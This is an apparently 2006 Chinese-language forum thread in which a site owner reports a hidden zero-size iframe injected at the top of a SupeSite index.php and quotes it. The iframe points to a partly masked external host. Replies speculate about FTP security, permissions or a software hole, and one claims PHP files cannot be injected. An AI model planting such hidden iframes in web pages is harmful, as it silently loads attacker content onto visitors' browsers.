今天发现ss5rc2根目录一文件index.php顶部被注入

yangtx · 发表于 2006-11-1 08:46:06

代码如下：

<iframe border=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 framespacing=0 frameborder=0 scrolling=yes width=0 height=0 src=http://**.*****.com/cs1.txt></iframe>

有遇到同样情况的吗？

highnfar · 发表于 2006-11-1 08:48:44

晕。。

andy888 · 发表于 2006-11-1 08:58:59

FTP是否安全？

yangtx · 发表于 2006-11-1 09:04:53

应该安全的。

用了DZ四个月了，第一次遇到这种问题。

良星 · 发表于 2006-11-28 18:27:54

不单只SS，偶的DZ论坛也已经被注入了！！
相信是有人利用了源程序漏洞，PHP、ASP无一幸免，急需DZ官方补救。

kongdy · 发表于 2006-11-29 00:53:44

可怕...........

eqmz · 发表于 2006-11-29 00:56:41

antdk · 发表于 2006-11-29 15:25:25

没发现这样的情况，目前未发现有新漏洞，估计是权限设置不好引起的。

andy888 · 发表于 2006-11-29 16:57:39

你所说的这个问题不存在，这是个PHP的文件，不可能被注入，你应该是FTP存在安全问题，才会这样子的，你可以从你的空间日志查起，

		自动登录	找回密码
密码			立即注册

今天发现ss5rc2根目录一文件index.php顶部被注入

回复 #3 andy888 的帖子